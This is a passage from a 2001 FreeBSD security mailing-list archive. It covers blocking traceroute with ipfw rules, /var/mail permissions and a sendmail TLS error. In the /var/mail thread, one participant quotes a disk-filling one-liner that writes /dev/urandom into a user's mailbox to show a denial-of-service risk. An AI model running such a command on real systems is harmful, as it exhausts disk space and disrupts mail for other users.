not a word. > > > alexus wrote: > > > > > > is it possible to disable using ipfw so people won't be able to traceroute > > > me? > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 13: 4: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from NOC.maKintosh.com (maKintosh.com [208.188.197.97]) by hub.freebsd.org (Postfix) with ESMTP id 4612237B401 for ; Mon, 25 Jun 2001 13:04:04 -0700 (PDT) (envelope-from co0kie@maKintosh.com) Received: by NOC.maKintosh.com (Postfix, from userid 1005) id B778E1068; Mon, 25 Jun 2001 14:57:38 -0500 (CDT) Date: Mon, 25 Jun 2001 14:57:38 -0500 From: co0kie bawx To: freebsd-security@FreeBSD.ORG Cc: ml@db.nexgen.com Subject: Re: disable traceroute to my host Message-ID: <20010625145738.A1282@NOC.maKintosh.com> References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> <01a401c0fdb0$d790b3f0$9865fea9@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <01a401c0fdb0$d790b3f0$9865fea9@book>; from ml@db.nexgen.com on Mon, Jun 25, 2001 at 03:55:53PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please try to answer some of your own questions first, before you post 11 questions, in 11 different posts to the list. There are alternative methods to find knowledge, rather than being lazy and expecting it from other people. .co0kie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 13: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id D10A737B405 for ; Mon, 25 Jun 2001 13:06:09 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 90035 invoked by uid 1001); 25 Jun 2001 20:06:07 +0000 (GMT) To: ml@db.nexgen.com Cc: freebsd-security@FreeBSD.ORG, freebsd-isp@FreeBSD.ORG Subject: Re: disable traceroute to my host From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 25 Jun 2001 15:55:53 -0400" References: <01a401c0fdb0$d790b3f0$9865fea9@book> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 25 Jun 2001 22:06:07 +0200 Message-ID: <90033.993499567@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > is there any place on internet where all protocols desicrbed .. like icmp and all types of icmps? i'd love to read about that www.rfc-editor.org is a good place to start. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 13:10:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id F375137B405 for ; Mon, 25 Jun 2001 13:10:00 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14599 invoked from network); 25 Jun 2001 20:10:49 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 20:10:49 -0000 Message-ID: <027401c0fdb2$d8d7ef10$9865fea9@book> From: "alexus" To: Cc: , References: <01a401c0fdb0$d790b3f0$9865fea9@book> <90033.993499567@verdi.nethelp.no> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 16:10:14 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thank you ----- Original Message ----- From: To: Cc: ; Sent: Monday, June 25, 2001 4:06 PM Subject: Re: disable traceroute to my host > > is there any place on internet where all protocols desicrbed .. like icmp and all types of icmps? i'd love to read about that > > www.rfc-editor.org > > is a good place to start. > > Steinar Haug, Nethelp consulting, sthaug@nethelp.no > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 14:41: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from i-sphere.com (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id 03E2C37B407 for ; Mon, 25 Jun 2001 14:40:56 -0700 (PDT) (envelope-from fasty@i-sphere.com) Received: (from fasty@localhost) by i-sphere.com (8.11.3/8.11.3) id f5PLmeT94495; Mon, 25 Jun 2001 14:48:40 -0700 (PDT) (envelope-from fasty) Date: Mon, 25 Jun 2001 14:48:39 -0700 From: faSty To: Jason DiCioccio Cc: freebsd-security@freebsd.org Subject: Re: "Correct" permissions on /var/mail? Message-ID: <20010625144839.C94318@i-sphere.com> References: <657B20E93E93D4118F9700D0B73CE3EA0166D9B4@goofy.epylon.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA0166D9B4@goofy.epylon.lan>; from jdicioccio@epylon.com on Mon, Jun 25, 2001 at 09:58:51AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org True, I would terminate the customer's account out of my server. simple -trev On Mon, Jun 25, 2001 at 09:58:51AM -0700, Jason DiCioccio wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I use the freebsd default, although someone could still fill up /var > if they wanted to.. (cat /dev/urandom >/var/mail/`whoami`) > > But 1777 they could create extra files, no? I'd rather not have a > second /tmp.. > > > Cheers, > - -JD- > > > - -----Original Message----- > From: Leonard Chung [mailto:leonard@ssl.berkeley.edu] > Sent: Sunday, June 24, 2001 2:12 PM > To: security@FreeBSD.ORG > Subject: "Correct" permissions on /var/mail? > > > I was having a debate with a colleague the other day on the correct > mode > for /var/mail. He claimed that 1777 is more secure than what I've > always > had (the FreeBSD default of root:mail 775). > > 1777 gives you the additional benefit of protecting you from > compromises on > the mail group, but requires that on every machine quotas be > installed even > for machines with just one or two users. Without quotas, a malicious > user > could fill up /var/mail creating a DoS for everybody receiving mail > off > that machine. 775 doesn't protect against compromises of the mail > group, > but has the added benefit that it protects against a user filling > /var/mail > inadvertently as they would have to purposely send lots of e-mail. > > Which do most of you use? Is there a reason /var/mail is initially > set to > 775 rather than 1777? > > Thanks, > > Leonard > > > - -- > Leonard Chung - > SETI@home - The Search for Extraterrestrial Intelligence @ home > http://www.setiathome.ssl.berkeley.edu > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 7.0.3 for non-commercial use > > iQA/AwUBOzdupVCmU62pemyaEQK3RwCgzkfVW04EYczOaPU7bJrNb1RQM2wAn0tI > VBfsNr+Jg1j6n+S40M4QXRMA > =RbAH > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 14:41:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 3C80337B40B for ; Mon, 25 Jun 2001 14:41:44 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 13634 invoked by uid 1000); 25 Jun 2001 21:42:04 -0000 Date: Mon, 25 Jun 2001 23:42:04 +0200 From: "Karsten W. Rohrbach" To: Nate Williams Cc: freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Message-ID: <20010625234204.A13392@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Nate Williams , freebsd-security@FreeBSD.ORG References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <20010624181614.E52432@mail.webmonster.de> <15159.37721.944609.942116@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="5mCyUwZo2JvN/JJP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <15159.37721.944609.942116@nomad.yogotech.com>; from nate@yogotech.com on Mon, Jun 25, 2001 at 01:39:05PM -0600 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Nate Williams(nate@yogotech.com)@2001.06.25 13:39:05 +0000: > > hehe, reminds me of this customer's nokia ip-330 sitting in the corner > > of my lab -- i probably will wipe ipso and this weird-ass checkpoint > > fw1, replace it with freebsd and ipfilter :-> >=20 > Except you'd be replacing the ip-330 running FreeBSD with another box > running FreeBSD. >=20 you know, it _would_ be a great product if the licensing would actually _work_ and the versioning trail would be well-documented. it's not the hardware, not the os, it's the whole dist and licensing concept. the checkpoint support people just keep giving me versions of the install package, different everytime and they go like this: "well, yes, the license you bought is for feature set bla-bla-3des-cpvig-bummer-25 and your installed package is *-des-* so you need the *-strong-* version from ftp url blabla". it wont work. they get back to me after tmy next bug report and tell me to switch it back to the other version then. i tell them to supply me the version they actually _mean_ and it has the same filename for the package, same version but different md5sum. what kind of fucked up release engineering is that? i use freebsd for years now and i never had such problems, everythings documented and so on but now i stop whining and get back to my really hard after-work job: it is half past eleven pm and i need to get drunk until midnight to forget all that crap of the last days ;-) > Nate (or Nate.Williams@nokia.com ;) i see, i get back to you off-list and describe the scenario if you wish. perhaps there's something we can do about all that stuff... /k --=20 > Only two things are infinite, the universe and human stupidity, and I'm > not sure about the former. --Albert Einstein=20 KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --5mCyUwZo2JvN/JJP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7N7ArM0BPTilkv0YRAiJ9AKC6jkxIb/iH1yhRkr7gvFT1SAEe4gCePIOb oprmsVyfWc5ByAePsylIoXc= =DpXO -----END PGP SIGNATURE----- --5mCyUwZo2JvN/JJP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 14:47:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 34FB337B406 for ; Mon, 25 Jun 2001 14:47:40 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA13630; Mon, 25 Jun 2001 15:47:38 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id PAA17110; Mon, 25 Jun 2001 15:47:37 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15159.45432.759210.854416@nomad.yogotech.com> Date: Mon, 25 Jun 2001 15:47:36 -0600 (MDT) To: "Karsten W. Rohrbach" Cc: Nate Williams , freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host In-Reply-To: <20010625234204.A13392@mail.webmonster.de> References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <20010624181614.E52432@mail.webmonster.de> <15159.37721.944609.942116@nomad.yogotech.com> <20010625234204.A13392@mail.webmonster.de> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > > hehe, reminds me of this customer's nokia ip-330 sitting in the corner > > > of my lab -- i probably will wipe ipso and this weird-ass checkpoint > > > fw1, replace it with freebsd and ipfilter :-> > > > > Except you'd be replacing the ip-330 running FreeBSD with another box > > running FreeBSD. > > you know, it _would_ be a great product if the licensing would actually > _work_ and the versioning trail would be well-documented. I'm not in the division that makes that box, although I've spoken with a couple of them. As I understand it, the CheckPoint stuff is the biggest nightmare of the entire product line. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 22:53:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 484C737B405 for ; Mon, 25 Jun 2001 22:53:18 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 18862 invoked by uid 1000); 26 Jun 2001 05:58:04 -0000 Date: Tue, 26 Jun 2001 08:58:04 +0300 From: Peter Pentchev To: alexus Cc: Simon Rakovec , freebsd-security@freebsd.org Subject: Re: disable traceroute to my host Message-ID: <20010626085804.E780@ringworld.oblivion.bg> Mail-Followup-To: alexus , Simon Rakovec , freebsd-security@freebsd.org References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01ec01c0fdb1$6c9cada0$9865fea9@book>; from ml@db.nexgen.com on Mon, Jun 25, 2001 at 04:00:03PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: > i agree this is not a solution.. looks like tty=1 is best solution so far TTL=1 is not a general solution, because it only blocks traceroutes to this particular host, not to any machines that it is acting as a gateway for. Moreover, TTL=1 is not a real-world solution, because some *legitimate* packets might arrive with TTL=1 (yes, there are some OS's that set too low TTL's on outgoing packets, and there are some global backbone ISP's which have a *lot* of routers, so it is possible that a normal packet destined for your host should reach you with TTL=1). And just btw.. Really, why do you want to block traceroutes? G'luck, Peter -- because I didn't think of a good beginning of it. > ----- Original Message ----- > From: "Peter Pentchev" > To: "Simon Rakovec" > Cc: > Sent: Monday, June 25, 2001 2:37 AM > Subject: Re: disable traceroute to my host > > > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > > Try this: > > > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > As Karsten noted in a followup, this is not proper network practice. > > There might be a LOT of things listening on those UDP ports, including > > ephemeral outgoing UDP connections. > > > > As many other people noted, this does not stop Windows traceroute, > > which goes via ICMP. > > > > As the traceroute(8) manpage notes, this does not stop people who > > know how to use the traceroute '-p port' option to select a starting > > port != 32768. > > > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable > > a person determined to traceroute you, and in practice, there is > > no need to. > > > > G'luck, > > Peter > > > > PS. How was that now... one source: plagiarism, two sources: comparative > > study, three sources: an academic thesis.. I did even better than that! > ;) > > > > -- > > Thit sentence is not self-referential because "thit" is not a word. > > > > > alexus wrote: > > > > > > > > is it possible to disable using ipfw so people won't be able to > traceroute > > > > me? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 23: 7:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 8F4BF37B409 for ; Mon, 25 Jun 2001 23:07:33 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 19019 invoked by uid 1000); 26 Jun 2001 06:12:20 -0000 Date: Tue, 26 Jun 2001 09:12:20 +0300 From: Peter Pentchev To: alexus Cc: ohshutup@zdnetonebox.com, freebsd-security@freebsd.org Subject: Re: disable traceroute to my host Message-ID: <20010626091220.G780@ringworld.oblivion.bg> Mail-Followup-To: alexus , ohshutup@zdnetonebox.com, freebsd-security@freebsd.org References: <20010622230217.JKT10107.mta05.onebox.com@onebox.com> <005f01c0fdac$15221010$9865fea9@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005f01c0fdac$15221010$9865fea9@book>; from ml@db.nexgen.com on Mon, Jun 25, 2001 at 03:21:49PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 25, 2001 at 03:21:49PM -0400, alexus wrote: > the thing is that windows based machines they using icmp for traceroute and > unix uses udp.. > > what i'd like to know is: > > which type of icmp uses for traceroute? (for example by deny icmp for > incoming icmptype 8 i was able to deny any pinging of my box from outside > *BUT* i can ping everyone myself from my box) tcpdump -nl icmp > also i'd like to know which standard range of ports udp uses in unix's > traceroute? man 8 traceroute G'luck, Peter -- because I didn't think of a good beginning of it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 23: 8:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id 3929737B405 for ; Mon, 25 Jun 2001 23:08:15 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id 3B3BF103; Tue, 26 Jun 2001 14:08:13 +0800 (KRAST) Date: Tue, 26 Jun 2001 14:09:20 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <157329906330.20010626140920@morning.ru> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010626085804.E780@ringworld.oblivion.bg> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: [...] > And just btw.. Really, why do you want to block traceroutes? the subject is flaming like a flame, but by its nature is quite peaceful :) so why bother with "why?"? :) ppl are talking, somebody even read what others write, and it grows and goes on and on :) > G'luck, > Peter -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 23:33: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.pentalpha.com.hk (ip211.bb168.pacific.net.hk [202.64.168.211]) by hub.freebsd.org (Postfix) with ESMTP id 13A2437B401; Mon, 25 Jun 2001 23:32:51 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: (from uucp@localhost) by gw.pentalpha.com.hk (8.11.4/8.11.4) id f5Q6WYP02107; Tue, 26 Jun 2001 14:32:34 +0800 (HKT) (envelope-from danny@pentalpha.com.hk) Received: from jessica.pentalpha.com.hk(10.0.0.8) via SMTP by gw.pentalpha.com.hk, id smtpdwFs5LN; Tue Jun 26 14:32:29 2001 Received: (from uucp@localhost) by jessica.pentalpha.com.hk (8.11.4/8.9.3) id f5Q6coC60892; Tue, 26 Jun 2001 14:38:50 +0800 (HKT) (envelope-from danny@pentalpha.com.hk) From: Danny Wong Received: from 001.mis.pentalpha.com.hk(10.0.0.168), claiming to be "mis001" via SMTP by jessica.pentalpha.com.hk, id smtpd7KDNh0; Tue Jun 26 14:38:50 2001 Message-ID: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk> Reply-To: To: , Subject: help on TLS error Date: Tue, 26 Jun 2001 14:32:25 +0800 Organization: Pentalpha MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I found the following error in the log file and the email cannot be send out. How can I find it? And what wrong with it? Jun 26 14:16:40 host sendmail[1069]: f5M9Rr631838: ruleset=tls_server, arg1=SOFTWARE, relay=mail.xxx.com, reject=403 4.7.0 ... TLS handshake failed. Thanks! Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 4:16:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 8310C37B401 for ; Tue, 26 Jun 2001 04:16:25 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id PAA29220; Tue, 26 Jun 2001 15:08:12 +0400 (MSD) Date: Tue, 26 Jun 2001 15:08:13 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.51) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: http://www.security.nnov.ru X-Priority: 3 (Normal) Message-ID: <3181060651.20010626150813@SECURITY.NNOV.RU> To: "alexus" Cc: freebsd-security@FreeBSD.org Subject: Re[2]: disable traceroute to my host In-Reply-To: <009201c0fdad$57c2af00$9865fea9@book> References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello alexus, BSD-style traceroute sends UDP packets starting from port 33434, increasing port for every packet. If someone traceroutes your host with 3 packets for each TTL, and your host is located in 4 hops you'll get UDP packets for ports 33443-33445 if your server will reply to traceroute or 33443-33490 (default is 20 hops max) if you host is unreachable. ipfw rule deny udp from any to YOURNET 33430-33500 in will stop default BSD traceroute, but can lead to some problems if this ports will be dynamically allocated to some program. Windows uses ICMP type 8 (echo) for traceroute. You must disable incoming ICMP type 8 to prevent windows-style traceroute (this will also stop discovering route via ping - R). Use deny icmp from any to YOURNET icmptypes 8 in. Another possible solution is to prevent your hosts from replying to traceroute. deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out 0 - to stop windows traceroute and ping 3 - to stop BSD-style traceroute 11 - to prevent intermediate router to reply traceroute --Monday, June 25, 2001, 11:30:50 PM, you wrote to 3APA3A@SECURITY.NNOV.RU: a> i understand i can't really disable the whole tree of traceroute .. i'm only a> can disable my very last hop.. i also understand it's not going do much.. a> but i still would like to do so.. a> i need to find out which icmp type is it uses and most of all how i can make a> so i can traceroute from my box but people won't be able to traceroute to me a> (on last hop) a> ----- Original Message ----- a> From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> a> To: "alexus" a> Sent: Saturday, June 23, 2001 7:05 AM a> Subject: Re: disable traceroute to my host >> Hello alexus, >> >> It's impossible to disable traceroute on your host. You can filter >> incoming ICMP echo request and UDP packets or outgoing TTL exceeded >> ICMP packets on corporate firewall to disable your internal network >> structure discovery, but it doesn't solve problem completely, because >> route can be traced with different kinds of packets. Better way is to >> use NAT between private and public networks. >> >> --Saturday, June 23, 2001, 2:32:10 AM, you wrote to a> freebsd-security@FreeBSD.ORG: >> >> a> is it possible to disable using ipfw so people won't be able to a> traceroute >> a> me? >> >> >> >> a> To Unsubscribe: send mail to majordomo@FreeBSD.org >> a> with "unsubscribe freebsd-security" in the body of the message >> >> >> -- >> ~/3APA3A >> ...áåç äóáèíêè íèêîãäà íå ïðèíèìàëñÿ îí çà ïðîãðàììèðîâàíèå. (Ëåì) >> >> >> -- ~/3APA3A Ïîêà âû âî âëàñòè ïðîâèäåíèÿ, âàì íå óäàñòñÿ óìåðåòü ðàíüøå ñðîêà. (Òâåí) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 4:23: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 398FB37B401 for ; Tue, 26 Jun 2001 04:22:56 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id OIL33944; Tue, 26 Jun 2001 14:21:58 +0300 (EEST) (envelope-from netch) Date: Tue, 26 Jun 2001 14:21:58 +0300 From: Valentin Nechayev To: Igor Podlesny Cc: Peter Pentchev , freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: disable traceroute to my host Message-ID: <20010626142158.A33308@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <157329906330.20010626140920@morning.ru> X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Tue, Jun 26, 2001 at 14:09:20, poige wrote about "Re[2]: disable traceroute to my host": > > And just btw.. Really, why do you want to block traceroutes? > the subject is flaming like a flame, but by its nature is quite peaceful :) > so why bother with "why?"? :) ppl are talking, somebody even read what > others write, and it grows and goes on and on :) Then, the first reply to such question should be: "You don't want to do it." ;))) /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 26 4:29:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id D093937B401 for ; Tue, 26 Jun 2001 04:29:09 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id OLC34556; Tue, 26 Jun 2001 14:28:53 +0300 (EEST) (envelope-from netch) Date: Tue, 26 Jun 2001 14:28:53 +0300 From: Valentin Nechayev To: Leonard Chung Cc: security@FreeBSD.ORG Subject: Re: "Correct" permissions on /var/mail? Message-ID: <20010626142853.B33308@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.2.20010624140225.02d492f0@chung.yikes.com> X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sun, Jun 24, 2001 at 14:11:54, leonard wrote about ""Correct" permissions on /var/mail?": > I was having a debate with a colleague the other day on the correct mode > for /var/mail. He claimed that 1777 is more secure than what I've always > had (the FreeBSD default of root:mail 775). 1777 has the only advantage that it doesn't require sgid privileges for MUAs. But such solution is not less harmful due to new /tmp in /var/mail. Better variant is to fix MUA to 